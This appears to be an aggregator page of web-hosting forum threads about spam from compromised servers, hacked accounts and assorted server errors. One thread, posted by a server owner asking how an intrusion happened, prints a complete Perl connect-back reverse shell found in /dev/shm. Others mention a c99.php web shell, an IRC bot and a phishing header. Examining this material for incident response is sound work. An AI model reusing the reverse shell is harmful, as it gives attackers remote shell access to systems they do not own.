Found The Spammer

Dec 31, 2007

How can I find the spammer on our server?

One of our customers is trying to send mail with a PHP file, but I cannot find this account. Can you help me find this user?

View 6 Replies



My Server Seems To Be A Spammer

Apr 29, 2009

I have recently been receiving reports from AOL's feedback loop that my server is sending out spam. I have checked the whole server, but cannot find anything strange.

There are some strange things with these feedback reports. I'll post a few lines below (I crossed out my domain with xxx):

Quote:

Received: from andersenreesel by holderem.xxx.biz with local (Exim 4.23)

Received: (qmail 64859 invoked by uid 24901)

Received: from janislanhami by xxx.biz with local (Exim 4.26)

Received: (qmail 43829 invoked by uid 147); 08 Apr 2009 21:22:39 -0000

Received: from raphaelpinkertone by standei.xxx.biz with local (Exim 4.23)

Received: from imanoldelphine by dispatched.xxx.biz with local (Exim 4.23)

Received: from conrado by hostic.xxx.biz with local (Exim 4.23)

The first issue I have is with the subdomains, like "dispatched", "standei", "hostic", etc. These subdomains do not exist on my system. Also, my server does not run the Exim MTA.

Another issue I have is the "invoked by uid" statements with UIDs 147 and 24901. These UIDs do not exist on my system. The passwd file UIDs go to around 110.

Apart from these strange things, the IP that is listed in the upper part of the headers:

Quote:

Received: from xxx.biz (xxx.biz [85.xxx.xxx.xxx])

The domain and IP address are correct there, which should indicate that the spam was sent from my system. Or wasn't it?

View 11 Replies View Related

IIS SMTP Spammer

May 10, 2009

To stop the IIS SMTP spammers, how do you find the culprit spammer's site? I tried the SMTP monitor, but to no avail.

View 10 Replies View Related

Chinese Spammer ...

Jun 24, 2008

I host a vBulletin forum on a US server. I've been getting a lot of signups from one particular spammer, wanting to post about gold harvesting for WoW. I've blocked his IPs; however, he keeps using proxies.

He constantly signs up under the name "Array"... Is there a way I can block him for good? I can't moderate user sign-ups, as I'm mostly away from my computer and can't moderate them all the time.

View 1 Replies View Related

How To Catch This Spammer

May 16, 2007

None of the domains in this email are hosted with us, but there are thousands of emails a day that somebody blasts into our queue. We have failed to detect it. We have enabled php nobody spam logging but failed to track this user.

How can we catch this spammer? There are no clues to catch him.

[root@sm4 ~]# /root/qmHandle -m3261696

--------------
MESSAGE NUMBER 3261696
--------------
Received: (qmail 7056 invoked from network); 16 May 2007 05:34:18 -0500
Received: from axicom.net (HELO User) (67.112.176.250)
by 14.32.5446.static.theplanet.com with SMTP; 16 May 2007 05:34:18 -0500
Reply-To: <notice@boamilitary.com>
From: "Bank of America Military Bank"<notice@boamilitary.com>
Subject: Notification from Bank of America Military Bank
Date: Wed, 16 May 2007 04:44:51 -0700
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000



View 10 Replies View Related

Hostmonster And Bluehost Spammer

Dec 26, 2008

What is the relationship between Hostmonster and Bluehost?

One spammer has a domain with an NS1.HOSTMONSTER.COM but their IP belongs to Bluehost.

View 7 Replies View Related

How To Monitor Spammer Activity

May 26, 2007

I just setup my own LAMP server.

It is only used for my own domains so I want to be able to watch all mail that gets sent from my server, via php or otherwise.

Basically I just want to be able to personally monitor what mail is getting sent from my server so that I can watch for possible spammer activity.

I am using Postfix and Webmin. I have sendmail installed too, but I don't think it is getting used.

I guess there's got to be a log somewhere, but I am not sure where it is?

I have Postfix set to CC me on all mail that gets sent, but it doesn't seem to work all the time, just for certain things.

View 3 Replies View Related

Keep Getting An Email Spammer On My Server

May 26, 2008

Now first I will say I have NO idea how such spamming works, how a punk can get on my server and send emails out.

I have had a team look at it, and they also did something, but now it has happened again for the 5th time. What can I do? Is there any software or tool one can use, like an antivirus, to check the server, and how can I avoid such sh..

View 14 Replies View Related

How I Can Stop Spammer From My Server

Jul 14, 2008

How can I stop a spammer on my server?

My control panel is cPanel!

What software must I install?

View 4 Replies View Related

Spammer On CPanel Server

Mar 31, 2008

I have the following inside /usr/local/apache/domlogs:


All these domains are NOT hosted on my server (there are a lot more of these entries).

I have been told that these domain names are used while spamming.

Is there any way to identify which account has been hacked and sends spam via POP3 or Apache?

I note a lot of POP3 connections from Russia, China and Vietnam, and high CPU load when this happens.

(The nobody sender has already been disabled in WHM tweaks.)

View 0 Replies View Related

How Did This Forum Spammer (sagepowder) Do This

Jan 7, 2007

I just found posts every few days from an apparent spammer "sagepowder" in my forum (not so popular and has nothing to do with skiing). The subject is always "new here".

The content is "Any snowboarders or skiiers on this forum? I am planning a trip to BC on a snowboarding trip next week" or "I am new here, just saying hello".

I checked the Apache log and it doesn't seem to be a robot script posting this, i.e. it browses to the index page, picks up my hidden field that blocks robots, posts a new topic, then goes back to the index page.

What surprised me is that when I google this guy, I got 108,000 results with the same content on tons of forums! All with total post number of 1 or 2 on each forum:
[url]

How did he do this? How to block this?

View 7 Replies View Related

What Is This Email Spammer Trying To Accomplish

Sep 26, 2007

I recently moved web services for one of my hosted domains (let's call it example.com) from one server (let's call it .org) to another server (let's call it .net) example.com has been on .org for about 5 years. .org handled all example.com web services, and all email. I recently updated example.com's DNS record to point www.example.com and example.com to the .net server. I didn't change the MX record or mail.example.com to point to .net. Mail continues to be delivered normally to example.com on the .org server.

Except now spammers are hitting the .net server, e.g.

Sep 26 09:26:03 host postfix/smtpd[15098]: NOQUEUE: reject: RCPT from unknown[12.171.150.130]: 554 5.7.1 <AutumnvagaryMontano@example.com>: Relay access denied; from=<> to=AutumnvagaryMontano@example.com proto=SMTP helo=<mdgen-print.marylandgeneral.org>

Is it normal practice for spammers to send dictionary attack based spam to a domain's server that doesn't even handle email? All the spam coming in is clearly just random email addresses not based on anything that exists at the domain, and most of the addresses are so very random I can't imagine they exist anywhere.

View 1 Replies View Related

Anyone Else Seeing WordPress Spammer DDOS

Jan 5, 2007

For about a month or so now I have a domain I host under serious attack from what I think are spammers. It's a wordpress site, and they are getting big numbers of POST requests to the WordPress comments file, e.g.

Code:

POST /wp-comments-post.php HTTP/1.1

It's a well distributed attack, and I'm doing well with some scripts I wrote to block the requests to the wp-comments-post.php file. The real comment file has long since been moved, so any POST to the file gets firewalled. It's several thousand IPs from all over the place.

I don't believe it's a malicious attempt to bring the site down, but I'm guessing it's a blog comment spammer that has something set wrong and he's pounding this site to death by accident. I could be wrong on that though.

Anyone have any good defense scripts to share?

View 7 Replies View Related

How We Can STOP This Spammer FOREVER

May 14, 2007

In our case, the HACKER does not DELETE files...

He sends spam by POST to file.php.

We have APACHE_suexec + PHP in SAFE_MODE=true;

The server has gone down 3 times in less than 24 hours for this reason.
At this moment we have more than 20,000 mails to send to Bellsouth and Yahoo...

We know this because we run

exim -bpr | exiqsumm -c | head

Count Volume Oldest Newest Domain
----- ------ ------ ------ ------
26797 66MB 7h 5m yahoo.com
3260 615KB 3h 3h bellsouth.net
1253 540KB 9h 2h webtv.net
1134 329KB 3h 2h excite.com
926 261KB 5h 3h optonline.net
226 258KB 3h 3h sbcglobal.net
----------------------------------------------

What can we do?

How can we stop these mails?

How can we STOP this spammer FOREVER?

View 2 Replies View Related

Plesk 12.x / Windows :: MailEnable Locate Spammer

Nov 5, 2014

My system is a Windows Server 2012 R2 with Plesk 12.

On this system I have installed MailEnable as my mail server.

So at the moment something is spamming on this server, but I can't find out who it is.

Received: from win02.XXXXXX([MY IP] helo=WIN02.home)
(envelope-from <root@XXXXXXXX>)
id 1XlyHP-00038b-R0
for x; Wed, 05 Nov 2014 11:57:37 +0100

[Code].....

The header means that the spam comes from root@, but there is no account with the name root@...

On Linux it is so easy to find the spam with qmail or Postfix. Why is it so difficult with MailEnable?

View 3 Replies View Related

Plesk 12.x / Linux :: Disable Php Mail For Spammer Clients?

Dec 9, 2014

Sometimes my clients install untrusted scripts on their account, which causes spamming because these scripts send a high number of spam emails. Is there an automatic way to disable the PHP mail function, or disable the account temporarily?

[URL]

View 3 Replies View Related

Hundreds Of "Mail Delivery Failed" Thanks To Spammer

Sep 22, 2007

Some f'in spammer has used my legitimate email address as the from address for their spam emails. Now I am getting hundreds of

"Mail delivery failed: returning message to sender" in my inbox.

I use cPanel to host the domain/email. Is there anything I can do?

View 2 Replies View Related

Dc.pl Found In /dev/shm

Apr 4, 2007

Found a suspicious script running on a server in /dev/shm

Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007

";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]

";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF

Removed it, changed all passwords, etc. Anyone know how this might've gotten into /dev/shm? (CentOS 4.4)

View 14 Replies View Related

New Malscripts Found

Jun 11, 2009

We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.

This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales, as anyone visiting with Firefox or Chrome as their browser was greeted with a big warning:

This site may harm your computer.

After about a week of trying to rectify the problem himself, he contacted us.

He provided us FTP access to his site so we could tackle it.

After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):

Code:....

View 0 Replies View Related

Ssl --address Not Found

Mar 16, 2009

I have a valid ssl certificate for the website but it still shows address not found error. But sometimes it just works fine.

Is it related to a DNS issue?

View 6 Replies View Related

Server Not Found

May 11, 2008

I do not know where to post this, I recently changed Hosts.

My domain through GoDaddy was changed to my new account that was set up. The issue is that everyone else can see my website but me, and I am not sure why.

On my end I get Server Not Found?

I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...

View 14 Replies View Related

Rootkit Found. What To Do Next?

Dec 1, 2008

For the first time after running a server for about a year, I decided to buy a new server, and in it I found out that there is some sort of infection. What should I do next? The logs are attached in an attachment.

Attached Files

rootkit.log.txt (9.4 KB, 70 views)

View 3 Replies View Related

Server Not Found

May 17, 2008

I can't visit my website! <snipped> Every time I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I can't? Yesterday the same thing happened, but then a couple of hours later it worked and I could visit hmlegends.com, but I didn't do anything, and now today the same thing: server not found! I cleaned my history, everything, and still server not found!

So what I did is used a proxy <snipped> and then it worked!

But then when I don't use a proxy: SERVER NOT FOUND! It's like my IP can't reach hmlegends.com.

I don't know how to solve this?!?? It just says server not found!

But it looks like everyone else can access it!

Anyway, I'm using Firefox 2, but then I thought maybe it was my browser, so I switched to 3, so I'm currently on Firefox 3,
and no, it's not that. It's something with my IP, because when I use a proxy I can go to my site.

But the point is I don't want to use a proxy, I want to use my IP to go to hmlegends.com.

Also im using Dial Up Internet!

I use AOL Dialer to connect!

Aol Dialer 4.8.8.4

View 9 Replies View Related

Apt-get Command Not Found

Apr 27, 2008

I have recently bought a VPS hosting package. At the moment I am going through the tutorials on the net that I had researched before getting a VPS package, to give me some understanding of what I need to do to secure the server and also how to install the software that I require.

For most of today, I have been trying to sort out a problem that I am currently having.

I am trying to sort out a part of a tutorial from a website that requires the use of apt commands.

But for every command I am getting the message back apt..... Command not found. I am currently using the Ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.

Would I be right, and with the bare installation apt commands wouldn't be installed?

If I am, how would I go about installing the Apt commands and anything else that I might require?

View 7 Replies View Related

Cronjob Not Found

Feb 22, 2008

I got a new box, and I see 'cronjob' is not working:

cronjob
-bash: cronjob: command not found

I installed

yum install vixie-cron.i386

Still

cronjob
-bash: cronjob: command not found

# cron
-bash: cron: command not found

How can I get 'cronjob' working?

View 4 Replies View Related

Cgi-bin Directory Not Found

Jan 20, 2008

I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory

When a user tries to access a script or even a standard text file, it throws up the error..

Not Found

The requested URL /cgi-bin/first.txt was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

When they try and access the cgi-bin directory itself, they get

Forbidden

You don't have permission to access /cgi-bin/ on this server

Now, I've checked the httpd.conf file and this is what it has for cgi-bin:

<IfModule alias_module>
    ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>

<Directory "/usr/local/apache/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

And the error logs say..

[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt

The cgi-bin directory is chmodded correctly; the files are also chmodded and belong to the correct group.

View 3 Replies View Related

PHP GD Module Not Found

Nov 16, 2007

While I am installing some programs, there is some problem in my PHP:

PHP GD Module Not Found

How could I install it as root over SSH?

View 10 Replies View Related

Found An IRC Bot On My Server

Mar 21, 2008

After going back and forth with the folks that are supposed to be managing my server they finally checked and found an irc bot. Here is their message:

I have found an IRC bot running on your server. The binaries are located at /var/lib/texmf/.dat/. You can see the tar file which the hacker uploaded at /var/lib/texmf/. I have changed the permissions to 000 so that you can verify the files.

The user of the files is nobody. Hence it is clear that the files were uploaded via URL injection using some vulnerable script under some domain. Unfortunately there are no helpful logs to find the exact domains and the vulnerable script. It is certain that the files were first uploaded to /tmp and then moved from there. You can see some similar hack files at /tmp/.dat, /tmp/var and /tmp/.dev12. Also the permission of /var/lib/texmf/ was 777.

You should update all your web software to the latest version so that it includes the latest security patches. Also I recommend you enable mod_security on your server to prevent further hacks.

Let us know if you want this to be enabled.

View 8 Replies View Related

Botnet Found

Jan 5, 2008

Our security technician found yesterday a 200 user botnet on a hidden IRC server and was able to quickly email the compromised systems' information (just hostname) to our abuse email. So today I spent the last 2 hours sending emails off to web hosting companies, educational institutions and corporate companies telling them that their systems have been compromised; we regularly email out systems we have found compromised. The thing that stuns me is that most of the systems we found compromised on IRC are dedicated lines between 10 Mbps and 1 Gbps... I found a few hosting companies and will list them so they can be found by them:


View 6 Replies View Related

Libmysqlclient_14' Not Found

Apr 21, 2007

My server uses cPanel 10x on CentOS.

How do I fix this problem?

php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)

View 1 Replies View Related

Script Found

Sep 27, 2007

I just found a script on a customer's account after some problems they were having. They mentioned injecting PHP code, which immediately threw up a red flag; when I took a look I found c99.php.

I checked up and this seems to be the web equivalent of a rootkit.

Are there any legitimate reasons for this script? The customer is one of the strangest I've come across, because he had the lowest fraud score yet, used a lady's name at signup/payment, yet calls himself Michael and seemed to do something with WHMCS security-wise. I don't want to post details as checks are still ongoing, but it seems to be a problem with language scripts, and the customer was able to sign up on a monthly plan but biannually... so no more invoices till 2009... strange, although whether this was done innocently or is a known security hole in WHMCS is not known yet.

View 14 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved